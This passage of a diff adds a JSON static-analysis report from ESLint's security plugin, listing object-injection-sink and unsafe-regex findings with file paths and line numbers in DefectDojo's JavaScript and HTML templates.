"https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 663, + "end_line": 663, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 664, + "end_line": 664, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 667, + "end_line": 667, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 668, + "end_line": 668, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 54, + "end_line": 54, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 671, + "end_line": 671, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 53, + "end_line": 53, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 52, + "end_line": 52, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 49, + "end_line": 49, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 47, + "end_line": 47, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 45, + "end_line": 45, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 672, + "end_line": 672, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 29, + "end_line": 29, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 26, + "end_line": 26, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 25, + "end_line": 25, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 24, + "end_line": 24, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 444, + "end_line": 444, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 99, + "end_line": 99, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 670, + "end_line": 670, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Unsafe Regular Expression", + "message": "Unsafe Regular Expression", + "description": "Potentially unsafe regular expressions. It may take a very long time to run.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-unsafe-regex", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 200, + "end_line": 200, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-unsafe-regex", + "value": "security/detect-unsafe-regex", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-unsafe-regex" + } + ] + }, + { + "category": "sast", + "name": "Unsafe Regular Expression", + "message": "Unsafe Regular Expression", + "description": "Potentially unsafe regular expressions. It may take a very long time to run.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-unsafe-regex", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 632, + "end_line": 632, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-unsafe-regex", + "value": "security/detect-unsafe-regex", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-unsafe-regex" + } + ] + }, + { + "category": "sast", + "name": "Unsafe Regular Expression", + "message": "Unsafe Regular Expression", + "description": "Potentially unsafe regular expressions. It may take a very long time to run.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-unsafe-regex", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 310, + "end_line": 310, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-unsafe-regex", + "value": "security/detect-unsafe-regex", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-unsafe-regex" + } + ] + }, + { + "category": "sast", + "name": "Unsafe Regular Expression", + "message": "Unsafe Regular Expression", + "description": "Potentially unsafe regular expressions. It may take a very long time to run.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-unsafe-regex", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 293, + "end_line": 293, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-unsafe-regex", + "value": "security/detect-unsafe-regex", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-unsafe-regex" + } + ] + }, + { + "category": "sast", + "name": "Unsafe Regular Expression", + "message": "Unsafe Regular Expression", + "description": "Potentially unsafe regular expressions. It may take a very long time to run.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-unsafe-regex", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 363, + "end_line": 363, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-unsafe-regex", + "value": "security/detect-unsafe-regex", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-unsafe-regex" + } + ] + }, + { + "category": "sast", + "name": "Unsafe Regular Expression", + "message": "Unsafe Regular Expression", + "description": "Potentially unsafe regular expressions. It may take a very long time to run.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-unsafe-regex", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 132, + "end_line": 132, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-unsafe-regex", + "value": "security/detect-unsafe-regex", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-unsafe-regex" + } + ] + }, + { + "category": "sast", + "name": "Unsafe Regular Expression", + "message": "Unsafe Regular Expression", + "description": "Potentially unsafe regular expressions. It may take a very long time to run.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-unsafe-regex", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 182, + "end_line": 182, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-unsafe-regex", + "value": "security/detect-unsafe-regex", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-unsafe-regex" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/index.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/index.js", + "start_line": 289, + "end_line": 289, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/index.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/index.js", + "start_line": 203, + "end_line": 203, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/index.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/index.js", + "start_line": 202, + "end_line": 202, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/index.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/index.js", + "start_line": 277, + "end_line": 277, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/edit_rule.html:174bf82e7bf9414dfe3028414c56de510e6e452ec85dc103a8d1ae8879d521a4:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/edit_rule.html", + "start_line": 74, + "end_line": 74, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/edit_rule.html:71101e0d191826f7a732714d5288da2446ab9bdb9eadb7e486b76624709f56ae:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/edit_rule.html", + "start_line": 71, + "end_line": 71, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/edit_rule.html:d89cdbb643440389e600693b61f838d7ebd9c0b6e51526fddef1566e555cbb02:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/edit_rule.html", + "start_line": 73, + "end_line": 73, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/edit_rule2.html:174bf82e7bf9414dfe3028414c56de510e6e452ec85dc103a8d1ae8879d521a4:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/edit_rule2.html", + "start_line": 81, + "end_line": 81, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/edit_rule2.html:71101e0d191826f7a732714d5288da2446ab9bdb9eadb7e486b76624709f56ae:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/edit_rule2.html", + "start_line": 78, + "end_line": 78, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/edit_rule2.html:d89cdbb643440389e600693b61f838d7ebd9c0b6e51526fddef1566e555cbb02:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/edit_rule2.html", + "start_line": 80, + "end_line": 80, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/endpoints.html:06c0a08b858a757bbfb193940ed6944251feb2c7e52c4092405edeb63fe8d9d4:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/endpoints.html", + "start_line": 140, + "end_line": 140, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/templates/dojo/endpoints.html:06c0a08b858a757bbfb193940ed6944251feb2c7e52c4092405edeb63fe8d9d4:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/templates/dojo/endpoints.html", + "start_line": 196, + "end_line": 196, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID 